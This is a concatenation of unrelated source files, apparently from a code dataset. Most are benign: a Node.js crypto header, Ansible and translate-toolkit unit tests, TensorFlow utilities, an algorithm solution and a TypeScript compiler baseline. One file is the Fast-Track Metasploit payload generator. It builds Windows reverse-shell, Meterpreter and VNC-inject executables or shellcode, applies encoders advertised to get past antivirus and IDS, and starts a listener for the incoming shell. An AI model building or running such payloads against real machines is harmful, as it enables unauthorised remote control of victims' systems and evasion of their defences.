// following conditions:
//
// The above copyright notice and this permission notice shall be included
// in all copies or substantial portions of the Software.
//
// THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS
// OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
// MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
// NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
// DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR
// OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE
// USE OR OTHER DEALINGS IN THE SOFTWARE.
#ifndef SRC_NODE_CRYPTO_H_
#define SRC_NODE_CRYPTO_H_
#if defined(NODE_WANT_INTERNALS) && NODE_WANT_INTERNALS
// All of the crypto definitions previously contained in this header
// have been split across multiple headers in src/crypto. This header
// remains for convenience for any code that still imports it. New
// code should include the relevant src/crypto headers directly.
#include "crypto/crypto_aes.h"
#include "crypto/crypto_argon2.h"
#include "crypto/crypto_bio.h"
#include "crypto/crypto_chacha20_poly1305.h"
#include "crypto/crypto_cipher.h"
#include "crypto/crypto_context.h"
#include "crypto/crypto_dh.h"
#include "crypto/crypto_dsa.h"
#include "crypto/crypto_ec.h"
#include "crypto/crypto_hash.h"
#include "crypto/crypto_hkdf.h"
#include "crypto/crypto_hmac.h"
#if OPENSSL_VERSION_MAJOR >= 3
#include "crypto/crypto_kem.h"
#include "crypto/crypto_kmac.h"
#endif
#include "crypto/crypto_keygen.h"
#include "crypto/crypto_keys.h"
#include "crypto/crypto_ml_dsa.h"
#include "crypto/crypto_pbkdf2.h"
#include "crypto/crypto_random.h"
#include "crypto/crypto_rsa.h"
#include "crypto/crypto_scrypt.h"
#include "crypto/crypto_sig.h"
#include "crypto/crypto_spkac.h"
#include "crypto/crypto_timing.h"
#include "crypto/crypto_tls.h"
#include "crypto/crypto_util.h"
#include "crypto/crypto_x509.h"
#endif // defined(NODE_WANT_INTERNALS) && NODE_WANT_INTERNALS
#endif // SRC_NODE_CRYPTO_H_ | c | github | https://github.com/nodejs/node | src/node_crypto.h |
# (c) 2016 Red Hat Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import json
from ansible.compat.tests.mock import patch
from ansible.modules.network.ios import ios_command
from .ios_module import TestIosModule, load_fixture, set_module_args
class TestIosCommandModule(TestIosModule):
    """Unit tests for the ios_command module; device I/O is mocked out."""

    module = ios_command

    def setUp(self):
        # Patch run_commands so no real IOS device connection is required.
        self.mock_run_commands = patch('ansible.modules.network.ios.ios_command.run_commands')
        self.run_commands = self.mock_run_commands.start()

    def tearDown(self):
        self.mock_run_commands.stop()

    def load_fixtures(self, commands=None):
        def load_from_file(*args, **kwargs):
            # args is (module, commands); serve each command's output from a
            # fixture file named after the command (spaces become '_').
            module, commands = args
            output = list()
            for item in commands:
                try:
                    # Commands may be JSON-encoded dicts carrying 'command'.
                    obj = json.loads(item['command'])
                    command = obj['command']
                except ValueError:
                    command = item['command']
                filename = str(command).replace(' ', '_')
                output.append(load_fixture(filename))
            return output

        self.run_commands.side_effect = load_from_file

    def test_ios_command_simple(self):
        # A single command yields a single stdout entry.
        set_module_args(dict(commands=['show version']))
        result = self.execute_module()
        self.assertEqual(len(result['stdout']), 1)
        self.assertTrue(result['stdout'][0].startswith('Cisco IOS Software'))

    def test_ios_command_multiple(self):
        set_module_args(dict(commands=['show version', 'show version']))
        result = self.execute_module()
        self.assertEqual(len(result['stdout']), 2)
        self.assertTrue(result['stdout'][0].startswith('Cisco IOS Software'))

    def test_ios_command_wait_for(self):
        # Condition matches the fixture output, so the module succeeds.
        wait_for = 'result[0] contains "Cisco IOS"'
        set_module_args(dict(commands=['show version'], wait_for=wait_for))
        self.execute_module()

    def test_ios_command_wait_for_fails(self):
        # Condition never matches: module fails after the default 10 retries.
        wait_for = 'result[0] contains "test string"'
        set_module_args(dict(commands=['show version'], wait_for=wait_for))
        self.execute_module(failed=True)
        self.assertEqual(self.run_commands.call_count, 10)

    def test_ios_command_retries(self):
        # Explicit retries=2 limits the number of run_commands attempts.
        wait_for = 'result[0] contains "test string"'
        set_module_args(dict(commands=['show version'], wait_for=wait_for, retries=2))
        self.execute_module(failed=True)
        self.assertEqual(self.run_commands.call_count, 2)

    def test_ios_command_match_any(self):
        # match='any': one passing condition out of two is sufficient.
        wait_for = ['result[0] contains "Cisco IOS"',
                    'result[0] contains "test string"']
        set_module_args(dict(commands=['show version'], wait_for=wait_for, match='any'))
        self.execute_module()

    def test_ios_command_match_all(self):
        # match='all': every condition must pass.
        wait_for = ['result[0] contains "Cisco IOS"',
                    'result[0] contains "IOSv Software"']
        set_module_args(dict(commands=['show version'], wait_for=wait_for, match='all'))
        self.execute_module()

    def test_ios_command_match_all_failure(self):
        # match='all' with one failing condition must fail the module.
        wait_for = ['result[0] contains "Cisco IOS"',
                    'result[0] contains "test string"']
        commands = ['show version', 'show version']
        set_module_args(dict(commands=commands, wait_for=wait_for, match='all'))
        self.execute_module(failed=True)
#!/usr/bin/env python
# Import modules
import subprocess,time,sys,os,re
definepath=os.getcwd()
sys.path.append("%s/bin/ftsrc/" % (definepath))
import include
# define metasploit path
# Scan the Fast-Track config file for the METASPLOIT_PATH=... line and
# keep its value (Python 2: file() is the built-in open).
meta_path=file("%s/config/fasttrack_config" % (definepath),"r").readlines()
for line in meta_path:
    line=line.rstrip()
    match=re.search("METASPLOIT_PATH",line)
    if match:
        line=line.replace("METASPLOIT_PATH=","")
        metapath=line
# Show the Fast-Track banner, then a short description of this tool.
include.print_banner()
print """
The Metasploit Payload Generator is a simple tool to
make it extremely easy to generate a payload and listener
on the Metasploit framework. This does not actually
exploit any systems, it will generate a metasploit payload
for you and save it to an executable. You then need to
someone get it on the remote server by yourself and get it
to execute correctly.
This will also encode your payload to get past most AV and
IDS/IPS.
"""
try:
# Specify path to metasploit
path=metapath
# Specify payload
choice1=raw_input(''' What payload do you want to generate:
Name: Description:
1. Windows Shell Reverse_TCP Spawn a command shell on victim and send back to attacker.
2. Windows Reverse_TCP Meterpreter Spawn a meterpreter shell on victim and send back to attacker.
3. Windows Reverse_TCP VNC DLL Spawn a VNC server on victim and send back to attacker.
4. Windows Bind Shell Execute payload and create an accepting port on remote system.
<ctrl>-c to Cancel
Enter choice (example 1-6): ''')
counter=0
if choice1=='1': choice1=("windows/shell_reverse_tcp")
if choice1=='2': choice1=("windows/meterpreter/reverse_tcp")
if choice1=='3':
choice1=("windows/vncinject/reverse_tcp")
shell=raw_input("Do you want a courtesy shell yes or no: ")
if shell=='yes' or shell=='y': courtesyshell=("DisableCourtesyShell=True")
if shell=='no' or shell=='no': courtesyshell=("")
counter=counter+1
if counter==0: courtesyshell=("")
if choice1=='4': choice1=("windows/shell_bind_tcp")
# Specify Encoding Option
# re-clear the screen
include.print_banner()
encode=raw_input('''
Below is a list of encodings to try and bypass AV.
Select one of the below, Avoid_UTF8_tolower usually gets past them.
1. avoid_utf8_tolower
2. shikata_ga_nai
3. alpha_mixed
4. alpha_upper
5. call4_dword_xor
6. countdown
7. fnstenv_mov
8. jmp_call_additive
9. nonalpha
10. nonupper
11. unicode_mixed
12. unicode_upper
13. alpha2
14. No Encoding
Enter your choice : ''')
if encode=='1': encode=("ENCODING=avoid_utf8_tolower")
if encode=='2': encode=("ENCODING=shikata_ga_nai")
if encode=='3': encode=("ENCODING=alpha_mixed")
if encode=='4': encode=("ENCODING=alpha_upper")
if encode=='5': encode=("ENCODING=call4_dword_xor")
if encode=='6': encode=("ENCODING=countdown")
if encode=='7': encode=("ENCODING=fnstenv_mov")
if encode=='8': encode=("ENCODING=jmp_call_additive")
if encode=='9': encode=("ENCODING=nonalpha")
if encode=='10': encode=("ENCODING=nonupper")
if encode=='11': encode=("ENCODING=unicode_mixed")
if encode=='12': encode=("ENCODING=unicode_upper")
if encode=='13': encode=("ENCODING=alpha2")
if encode=='14': encode=("")
# Specify Remote Host
choice2=raw_input("\n Enter IP Address of the listener/attacker (reverse) or host/victim (bind shell): ")
choice3=raw_input(" Enter the port of the Listener: ")
choice4=raw_input('''\n Do you want to create an EXE or Shellcode
1. Executable
2. Shellcode
Enter your choice: ''')
if choice4 =='1':
choice4=("X")
choice5=("exe")
if choice4 =='2':
choice4=("C")
choice5=("txt")
# Coming soon...
#restricted=raw_input("Do you want to avoid certain restricted characters, yes or no: ")
#if restricted == 'yes' or restricted == 'y':
# restricted=raw_input(r"""
#Restricted characters are those that may get jacked up within
#the stack. Which ones would you like to avoid.
#
#Example: \x00\xff
#
#Which chars would you like to restrict: """)
# restrict=(r"-b " + "'"+restricted+"'")
# if restricted == 'no' or restricted == 'n' : restrict = ''
generatepayload=subprocess.Popen(r"%smsfpayload %s LHOST=%s LPORT=%s %s %s %s > payload.%s" % (path,choice1,choice2,choice3,encode,courtesyshell,choice4,choice5), shell=True).wait()
print "\n\n A payload has been created in this directory and is named 'payload.%s'. Enjoy!\n\n" % (choice5)
# Start listener code
listener=raw_input(" Do you want to start a listener to receive the payload yes or no: ")
if listener=='yes' or listener =='y':
# if they want a listener, start here
print "\n Launching Listener..."
# launch actual listener
print "***********************************************************************************************"
print """\n Launching MSFCLI on 'exploit/multi/handler' with PAYLOAD='%s'
Listening on IP: %s on Local Port: %s Using encoding: %s\n""" % (choice1, choice2, choice3, encode)
print "***********************************************************************************************"
listeerlaunch=subprocess.Popen("%s/msfcli exploit/multi/handler PAYLOAD=%s LHOST=%s LPORT=%s %s E" % (path,choice1,choice2,choice3,encode), shell=True).wait()
else:
print "\n\n Exiting PayloadGen...Hack the gibson....\n\n"
sys.exit(1)
# Catch all errors
except KeyboardInterrupt: print "\n\n Keyboard Interrupt Detected, exiting Payload Gen.\n"
except Exception,e:
print " Something went wrong, printing error message.."
print e | unknown | codeparrot/codeparrot-clean | ||
#include <immintrin.h>
#ifdef _MSC_VER
#include <ammintrin.h>
#else
#include <x86intrin.h>
#endif

/*
 * Appears to be a build-time probe for AMD XOP support: it compiles only
 * when the toolchain provides the XOP intrinsic _mm_comge_epu32.  The
 * returned value is irrelevant; successful compilation is the signal.
 */
int main(void)
{
    /* XOP unsigned >= comparison of two zero vectors. */
    __m128i a = _mm_comge_epu32(_mm_setzero_si128(), _mm_setzero_si128());
    return _mm_cvtsi128_si32(a);
}
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utils for Estimator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from tensorflow.python.util import tf_inspect
def assert_estimator_contract(tester, estimator_class):
  """Asserts whether given estimator satisfies the expected contract.

  This doesn't check every details of contract. This test is used for that a
  function is not forgotten to implement in a precanned Estimator.

  Args:
    tester: A tf.test.TestCase.
    estimator_class: 'type' object of pre-canned estimator.
  """
  attributes = tf_inspect.getmembers(estimator_class)
  attribute_names = [a[0] for a in attributes]

  # Every pre-canned Estimator must expose this public surface; a loop keeps
  # the checks consistent and makes the list easy to extend.
  expected_members = (
      'config',
      'evaluate',
      'export',
      'fit',
      'get_variable_names',
      'get_variable_value',
      'model_dir',
      'predict',
  )
  for member in expected_members:
    tester.assertTrue(member in attribute_names)
def assert_in_range(min_value, max_value, key, metrics):
  """Raises ValueError unless metrics[key] lies in [min_value, max_value].

  Args:
    min_value: inclusive lower bound.
    max_value: inclusive upper bound.
    key: metric name to look up in `metrics`.
    metrics: mapping of metric name to value.

  Raises:
    ValueError: if the metric value falls outside the allowed range.
  """
  actual = metrics[key]
  if actual < min_value:
    raise ValueError('%s: %s < %s.' % (key, actual, min_value))
  elif actual > max_value:
    raise ValueError('%s: %s > %s.' % (key, actual, max_value))
"""
Given a sorted array of integers nums and integer values a, b and c, apply a function of the form f(x) = ax^2 + bx + c to each element x in the array.
The returned array must be in sorted order.
Expected time complexity: O(n)
Example:
nums = [-4, -2, 2, 4], a = 1, b = 3, c = 5,
Result: [3, 9, 15, 33]
nums = [-4, -2, 2, 4], a = -1, b = 3, c = 5
Result: [-23, -5, 1, 7]
"""
class Solution(object):
    def sortTransformedArray(self, nums, a, b, c):
        """Return f(x) = a*x^2 + b*x + c applied to each x, in sorted order.

        Runs in O(n): for a quadratic the extreme values sit at the two ends
        of the (sorted) input, so the result is filled with two pointers.

        :type nums: List[int]
        :type a: int
        :type b: int
        :type c: int
        :rtype: List[int]
        """
        # Linear case: f is monotonic over the sorted input.
        if a == 0:
            mapped = [b * x + c for x in nums]
            return mapped if b >= 0 else mapped[::-1]

        def quad(x):
            return a * x * x + b * x + c

        n = len(nums)
        result = [0] * n
        lo, hi = 0, n - 1
        if a > 0:
            # Parabola opens upward: the largest values are at the ends,
            # so fill the result from its back toward its front.
            for slot in range(n - 1, -1, -1):
                left_val, right_val = quad(nums[lo]), quad(nums[hi])
                if left_val >= right_val:
                    result[slot] = left_val
                    lo += 1
                else:
                    result[slot] = right_val
                    hi -= 1
        else:
            # Parabola opens downward: the smallest values are at the ends,
            # so fill the result from its front toward its back.
            for slot in range(n):
                left_val, right_val = quad(nums[lo]), quad(nums[hi])
                if left_val <= right_val:
                    result[slot] = left_val
                    lo += 1
                else:
                    result[slot] = right_val
                    hi -= 1
        return result
//// [tests/cases/conformance/classes/propertyMemberDeclarations/autoAccessor5.ts] ////
//// [autoAccessor5.ts]
class C1 {
accessor ["w"]: any;
accessor ["x"] = 1;
static accessor ["y"]: any;
static accessor ["z"] = 2;
}
declare var f: any;
class C2 {
accessor [f()] = 1;
}
//// [autoAccessor5.js]
"use strict";
// Down-level helper emitted by TypeScript: reads a private field/accessor
// after validating that `receiver` actually declared the private member.
// (Compiler baseline output — code must stay byte-identical to the emit.)
var __classPrivateFieldGet = (this && this.__classPrivateFieldGet) || function (receiver, state, kind, f) {
    if (kind === "a" && !f) throw new TypeError("Private accessor was defined without a getter");
    if (typeof state === "function" ? receiver !== state || !f : !state.has(receiver)) throw new TypeError("Cannot read private member from an object whose class did not declare it");
    return kind === "m" ? f : kind === "a" ? f.call(receiver) : f ? f.value : state.get(receiver);
};
// Down-level helper emitted by TypeScript: writes a private field/accessor
// with the same declaration checks as the getter helper.
var __classPrivateFieldSet = (this && this.__classPrivateFieldSet) || function (receiver, state, value, kind, f) {
    if (kind === "m") throw new TypeError("Private method is not writable");
    if (kind === "a" && !f) throw new TypeError("Private accessor was defined without a setter");
    if (typeof state === "function" ? receiver !== state || !f : !state.has(receiver)) throw new TypeError("Cannot write private member to an object whose class did not declare it");
    return (kind === "a" ? f.call(receiver, value) : f ? f.value = value : state.set(receiver, value)), value;
};
// Hoisted storage for C2's accessor backing field and its computed key.
var _C2__a_accessor_storage, _a;
// Generated down-level emit for `class C1` with auto-accessors: each
// `accessor` member becomes a WeakMap-backed (or object-backed, for
// statics) get/set property pair. (Compiler baseline — do not hand-edit.)
var C1 = /** @class */ (function () {
    function C1() {
        _C1__b_accessor_storage.set(this, void 0);
        _C1__c_accessor_storage.set(this, 1);
    }
    Object.defineProperty(C1.prototype, (_C1__b_accessor_storage = new WeakMap(), _C1__c_accessor_storage = new WeakMap(), "w"), {
        get: function () { return __classPrivateFieldGet(this, _C1__b_accessor_storage, "f"); },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(C1.prototype, "w", {
        set: function (value) { __classPrivateFieldSet(this, _C1__b_accessor_storage, value, "f"); },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(C1.prototype, "x", {
        get: function () { return __classPrivateFieldGet(this, _C1__c_accessor_storage, "f"); },
        set: function (value) { __classPrivateFieldSet(this, _C1__c_accessor_storage, value, "f"); },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(C1, "y", {
        get: function () { return __classPrivateFieldGet(_b, _b, "f", _C1__d_accessor_storage); },
        set: function (value) { __classPrivateFieldSet(_b, _b, value, "f", _C1__d_accessor_storage); },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(C1, "z", {
        get: function () { return __classPrivateFieldGet(_b, _b, "f", _C1__e_accessor_storage); },
        set: function (value) { __classPrivateFieldSet(_b, _b, value, "f", _C1__e_accessor_storage); },
        enumerable: false,
        configurable: true
    });
    var _b, _C1__b_accessor_storage, _C1__c_accessor_storage, _C1__d_accessor_storage, _C1__e_accessor_storage;
    _b = C1;
    _C1__d_accessor_storage = { value: void 0 };
    _C1__e_accessor_storage = { value: 2 };
    return C1;
}());
// Generated down-level emit for `class C2`, whose accessor key is computed
// at class-evaluation time (`_a = f()`). (Compiler baseline — do not
// hand-edit.)
var C2 = /** @class */ (function () {
    function C2() {
        _C2__a_accessor_storage.set(this, 1);
    }
    Object.defineProperty(C2.prototype, (_C2__a_accessor_storage = new WeakMap(), _a = f()), {
        get: function () { return __classPrivateFieldGet(this, _C2__a_accessor_storage, "f"); },
        enumerable: false,
        configurable: true
    });
    Object.defineProperty(C2.prototype, _a, {
        set: function (value) { __classPrivateFieldSet(this, _C2__a_accessor_storage, value, "f"); },
        enumerable: false,
        configurable: true
    });
    return C2;
}());
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from translate.convert import po2prop, test_convert
from translate.misc import wStringIO
from translate.storage import po
class TestPO2Prop:
    """Unit tests for converting PO translations into .properties output.

    Fixture strings are built in-memory; no files are read or written.
    """

    def po2prop(self, posource):
        """helper that converts po source to .properties source without requiring files"""
        inputfile = wStringIO.StringIO(posource)
        inputpo = po.pofile(inputfile)
        convertor = po2prop.po2prop()
        outputprop = convertor.convertstore(inputpo)
        return outputprop

    def merge2prop(self, propsource, posource, personality="java", remove_untranslated=False):
        """helper that merges po translations to .properties source without requiring files"""
        inputfile = wStringIO.StringIO(posource)
        inputpo = po.pofile(inputfile)
        templatefile = wStringIO.StringIO(propsource)
        #templateprop = properties.propfile(templatefile)
        convertor = po2prop.reprop(templatefile, inputpo, personality=personality, remove_untranslated=remove_untranslated)
        outputprop = convertor.convertstore()
        print(outputprop)
        return outputprop

    def test_merging_simple(self):
        """check the simplest case of merging a translation"""
        posource = '''#: prop\nmsgid "value"\nmsgstr "waarde"\n'''
        proptemplate = '''prop=value\n'''
        propexpected = '''prop=waarde\n'''
        propfile = self.merge2prop(proptemplate, posource)
        print(propfile)
        assert propfile == propexpected

    def test_merging_untranslated(self):
        """check the simplest case of merging an untranslated unit"""
        posource = '''#: prop\nmsgid "value"\nmsgstr ""\n'''
        proptemplate = '''prop=value\n'''
        # Untranslated units keep the template (source) text by default.
        propexpected = proptemplate
        propfile = self.merge2prop(proptemplate, posource)
        print(propfile)
        assert propfile == propexpected

    def test_hard_newlines_preserved(self):
        """check that we preserver hard coded newlines at the start and end of sentence"""
        posource = '''#: prop\nmsgid "\\nvalue\\n\\n"\nmsgstr "\\nwaarde\\n\\n"\n'''
        proptemplate = '''prop=\\nvalue\\n\\n\n'''
        propexpected = '''prop=\\nwaarde\\n\\n\n'''
        propfile = self.merge2prop(proptemplate, posource)
        print(propfile)
        assert propfile == propexpected

    def test_space_preservation(self):
        """check that we preserve any spacing in properties files when merging"""
        posource = '''#: prop\nmsgid "value"\nmsgstr "waarde"\n'''
        proptemplate = '''prop = value\n'''
        propexpected = '''prop = waarde\n'''
        propfile = self.merge2prop(proptemplate, posource)
        print(propfile)
        assert propfile == propexpected

    def test_merging_blank_entries(self):
        """check that we can correctly merge entries that are blank in the template"""
        posource = r'''#: accesskey-accept
msgid ""
"_: accesskey-accept\n"
""
msgstr ""'''
        proptemplate = 'accesskey-accept=\n'
        propexpected = 'accesskey-accept=\n'
        propfile = self.merge2prop(proptemplate, posource)
        print(propfile)
        assert propfile == propexpected

    def test_merging_fuzzy(self):
        """check merging a fuzzy translation"""
        # Fuzzy translations are not merged; the template value is kept.
        posource = '''#: prop\n#, fuzzy\nmsgid "value"\nmsgstr "waarde"\n'''
        proptemplate = '''prop=value\n'''
        propexpected = '''prop=value\n'''
        propfile = self.merge2prop(proptemplate, posource)
        print(propfile)
        assert propfile == propexpected

    def test_mozilla_accesskeys(self):
        """check merging Mozilla accesskeys"""
        # The '&' marker in the PO translation supplies both the label and
        # the derived accesskey in the merged output.
        posource = '''#: prop.label prop.accesskey
msgid "&Value"
msgstr "&Waarde"
#: key.label key.accesskey
msgid "&Key"
msgstr "&Sleutel"
'''
        proptemplate = '''prop.label=Value
prop.accesskey=V
key.label=Key
key.accesskey=K
'''
        propexpected = '''prop.label=Waarde
prop.accesskey=W
key.label=Sleutel
key.accesskey=S
'''
        propfile = self.merge2prop(proptemplate, posource, personality="mozilla")
        print(propfile)
        assert propfile == propexpected

    def test_mozilla_accesskeys_missing_accesskey(self):
        """check merging Mozilla accesskeys"""
        # Without an '&' marker, the template's accesskey is retained.
        posource = '''#: prop.label prop.accesskey
# No accesskey because we forgot or language doesn't do accesskeys
msgid "&Value"
msgstr "Waarde"
'''
        proptemplate = '''prop.label=Value
prop.accesskey=V
'''
        propexpected = '''prop.label=Waarde
prop.accesskey=V
'''
        propfile = self.merge2prop(proptemplate, posource, personality="mozilla")
        print(propfile)
        assert propfile == propexpected

    def test_mozilla_margin_whitespace(self):
        """Check handling of Mozilla leading and trailing spaces"""
        posource = '''#: sepAnd
msgid " and "
msgstr " و "
#: sepComma
msgid ", "
msgstr "، "
'''
        proptemplate = r'''sepAnd = \u0020and\u0020
sepComma = ,\u20
'''
        propexpected = r'''sepAnd = \u0020و\u0020
sepComma = ،\u0020
'''
        propfile = self.merge2prop(proptemplate, posource, personality="mozilla")
        print(propfile)
        assert propfile == propexpected

    def test_mozilla_all_whitespace(self):
        """Check for all white-space Mozilla hack, remove when the
        corresponding code is removed."""
        posource = '''#: accesskey-accept
msgctxt "accesskey-accept"
msgid ""
msgstr " "
#: accesskey-help
msgid "H"
msgstr "م"
'''
        proptemplate = '''accesskey-accept=
accesskey-help=H
'''
        propexpected = '''accesskey-accept=
accesskey-help=م
'''
        propfile = self.merge2prop(proptemplate, posource, personality="mozilla")
        print(propfile)
        assert propfile == propexpected

    def test_merging_propertyless_template(self):
        """check that when merging with a template with no property values that we copy the template"""
        posource = ""
        proptemplate = "# A comment\n"
        propexpected = proptemplate
        propfile = self.merge2prop(proptemplate, posource)
        print(propfile)
        assert propfile == propexpected

    def test_delimiters(self):
        """test that we handle different delimiters."""
        posource = '''#: prop\nmsgid "value"\nmsgstr "translated"\n'''
        proptemplate = '''prop %s value\n'''
        propexpected = '''prop %s translated\n'''
        # '=' and ':' are explicit delimiters; '' means whitespace-delimited.
        for delim in ['=', ':', '']:
            print("testing '%s' as delimiter" % delim)
            propfile = self.merge2prop(proptemplate % delim, posource)
            print(propfile)
            assert propfile == propexpected % delim

    def test_empty_value(self):
        """test that we handle an value in the template"""
        posource = '''#: key
msgctxt "key"
msgid ""
msgstr "translated"
'''
        proptemplate = '''key\n'''
        propexpected = '''key = translated\n'''
        propfile = self.merge2prop(proptemplate, posource)
        print(propfile)
        assert propfile == propexpected

    def test_personalities(self):
        """test that we output correctly for Java and Mozilla style property files. Mozilla uses Unicode, while Java uses escaped Unicode"""
        posource = u'''#: prop\nmsgid "value"\nmsgstr "ṽḁḽṻḝ"\n'''
        proptemplate = u'''prop = value\n'''
        # Java escapes non-ASCII as \\uXXXX sequences.
        propexpectedjava = u'''prop = \\u1E7D\\u1E01\\u1E3D\\u1E7B\\u1E1D\n'''
        propfile = self.merge2prop(proptemplate, posource)
        assert propfile == propexpectedjava
        # Mozilla writes raw UTF-8.
        propexpectedmozilla = u'''prop = ṽḁḽṻḝ\n'''.encode('utf-8')
        propfile = self.merge2prop(proptemplate, posource, personality="mozilla")
        assert propfile == propexpectedmozilla
        # Skype uses UTF-16.
        proptemplate = u'''prop = value\n'''.encode('utf-16')
        propexpectedskype = u'''prop = ṽḁḽṻḝ\n'''.encode('utf-16')
        propfile = self.merge2prop(proptemplate, posource, personality="skype")
        assert propfile == propexpectedskype
        # Mac .strings files use quoted pairs in UTF-16.
        proptemplate = u'''"prop" = "value";\n'''.encode('utf-16')
        propexpectedstrings = u'''"prop" = "ṽḁḽṻḝ";\n'''.encode('utf-16')
        propfile = self.merge2prop(proptemplate, posource, personality="strings")
        assert propfile == propexpectedstrings

    def test_merging_untranslated_simple(self):
        """check merging untranslated entries in two 1) use English 2) drop key, value pair"""
        posource = '''#: prop\nmsgid "value"\nmsgstr ""\n'''
        proptemplate = '''prop = value\n'''
        propfile = self.merge2prop(proptemplate, posource)
        print(propfile)
        assert propfile == proptemplate  # We use the existing values
        propfile = self.merge2prop(proptemplate, posource, remove_untranslated=True)
        print(propfile)
        assert propfile == ''  # We drop the key

    def test_merging_untranslated_multiline(self):
        """check merging untranslated entries with multiline values"""
        posource = '''#: prop\nmsgid "value1 value2"\nmsgstr ""\n'''
        # Template value continues onto a second line via backslash.
        proptemplate = '''prop = value1 \
value2
'''
        propexpected = '''prop = value1 value2\n'''
        propfile = self.merge2prop(proptemplate, posource)
        print(propfile)
        assert propfile == propexpected  # We use the existing values
        propfile = self.merge2prop(proptemplate, posource, remove_untranslated=True)
        print(propfile)
        assert propfile == ''  # We drop the key

    def test_merging_untranslated_comments(self):
        """check merging untranslated entries with comments"""
        posource = '''#: prop\nmsgid "value"\nmsgstr ""\n'''
        proptemplate = '''# A comment\nprop = value\n'''
        propexpected = '# A comment\nprop = value\n'
        propfile = self.merge2prop(proptemplate, posource)
        print(propfile)
        assert propfile == propexpected  # We use the existing values
        propfile = self.merge2prop(proptemplate, posource, remove_untranslated=True)
        print(propfile)
        # FIXME ideally we should drop the comment as well as the unit
        assert propfile == '# A comment\n'  # We drop the key

    def test_merging_untranslated_unchanged(self):
        """check removing untranslated entries but keeping unchanged ones"""
        posource = '''#: prop
msgid "value"
msgstr ""
#: prop2
msgid "value2"
msgstr "value2"
'''
        proptemplate = '''prop=value
prop2=value2
'''
        propexpected = '''prop2=value2\n'''
        propfile = self.merge2prop(proptemplate, posource, remove_untranslated=True)
        print(propfile)
        assert propfile == propexpected

    def test_merging_blank(self):
        """We always merge in a blank translation for a blank source"""
        posource = '''#: prop
msgctxt "prop"
msgid ""
msgstr "value"
#: prop2
msgctxt "prop2"
msgid ""
msgstr ""
'''
        proptemplate = '''prop=
prop2=
'''
        propexpected = '''prop=value
prop2=
'''
        # Result is the same whether or not untranslated units are removed.
        propfile = self.merge2prop(proptemplate, posource, remove_untranslated=False)
        print(propfile)
        assert propfile == propexpected
        propfile = self.merge2prop(proptemplate, posource, remove_untranslated=True)
        print(propfile)
        assert propfile == propexpected

    def test_gaia_plurals(self):
        """Test back conversion of gaia plural units."""
        proptemplate = '''
message-multiedit-header={[ plural(n) ]}
message-multiedit-header[zero]=Edit
message-multiedit-header[one]={{ n }} selected
message-multiedit-header[two]={{ n }} selected
message-multiedit-header[few]={{ n }} selected
message-multiedit-header[many]={{ n }} selected
message-multiedit-header[other]={{ n }} selected
'''
        posource = r'''#: message-multiedit-header[zero]
msgctxt "message-multiedit-header[zero]"
msgid "Edit"
msgstr "Redigeer"
#: message-multiedit-header
msgctxt "message-multiedit-header"
msgid "Edit"
msgid_plural "{{ n }} selected"
msgstr[0] "xxxRedigeerxxx"
msgstr[1] "{{ n }} gekies"
msgstr[2] "{{ n }} gekies"
msgstr[3] "{{ n }} gekies"
msgstr[4] "{{ n }} gekies"
msgstr[5] "{{ n }} gekies"
'''
        # Note: the [zero] form comes from the dedicated [zero] unit, not
        # from msgstr[0] of the plural unit.
        propexpected = '''
message-multiedit-header={[ plural(n) ]}
message-multiedit-header[zero]=Redigeer
message-multiedit-header[one]={{ n }} gekies
message-multiedit-header[two]={{ n }} gekies
message-multiedit-header[few]={{ n }} gekies
message-multiedit-header[many]={{ n }} gekies
message-multiedit-header[other]={{ n }} gekies
'''
        propfile = self.merge2prop(proptemplate, posource, personality="gaia")
        assert propfile == propexpected
class TestPO2PropCommand(test_convert.TestConvertCommand, TestPO2Prop):
    """Tests running actual po2prop commands on files"""
    convertmodule = po2prop
    defaultoptions = {"progress": "none"}

    def test_help(self):
        """tests getting help"""
        options = test_convert.TestConvertCommand.test_help(self)
        # Every po2prop-specific switch must appear in the help output.
        switches = (
            "-t TEMPLATE, --template=TEMPLATE",
            "--fuzzy",
            "--threshold=PERCENT",
            "--personality=TYPE",
            "--encoding=ENCODING",
            "--removeuntranslated",
        )
        for switch in switches:
            options = self.help_check(options, switch)
        options = self.help_check(options, "--nofuzzy", last=True)
import os
import sys
from gettext import gettext as _
from optparse import OptionParser, OptionGroup
from subprocess import Popen, PIPE
from hashlib import sha256
# Directory (relative to a module) where 'puppet module build' writes archives.
PKG_DIR = 'pkg'
# File extension of the archives produced by 'puppet module build'.
ARCHIVE_SUFFIX = '.tar.gz'

# --- gettext-wrapped command line help strings ---
PATH = _('the path to be searched for puppet modules. the path must be'
         ' relative to the working directory. when not specified,'
         ' the working directory is searched.')
URL = _('the URL to a git repository to be cloned. repositories'
